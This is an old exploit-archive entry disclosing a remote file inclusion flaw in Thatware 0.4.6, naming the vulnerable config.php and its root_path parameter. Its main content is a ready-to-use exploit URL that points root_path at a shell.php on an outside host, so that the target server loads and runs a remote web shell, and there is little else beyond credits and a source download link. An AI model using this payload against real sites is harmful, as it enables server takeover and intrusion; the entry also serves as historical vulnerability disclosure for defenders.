Thatware <= 0.4.6 (root_path) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Thatware <= 0.4.6 (root_path) Remote File Include Vulnerability
# Published : 2006-08-10
# Author : Drago84
# Previous Title : phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability
# Next Title : SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability

Thatware  0.4.6 (root_path) Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84

Source Code:
http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware_0.4.6.tar.gz

Page Affect
config.php

ExP:
http://www.sito.com/dir_thatware/config.php?root_path=http://www.evalsite.com/shell.php'

Greatz: str0ke

# www.Syue.com [2006-08-10]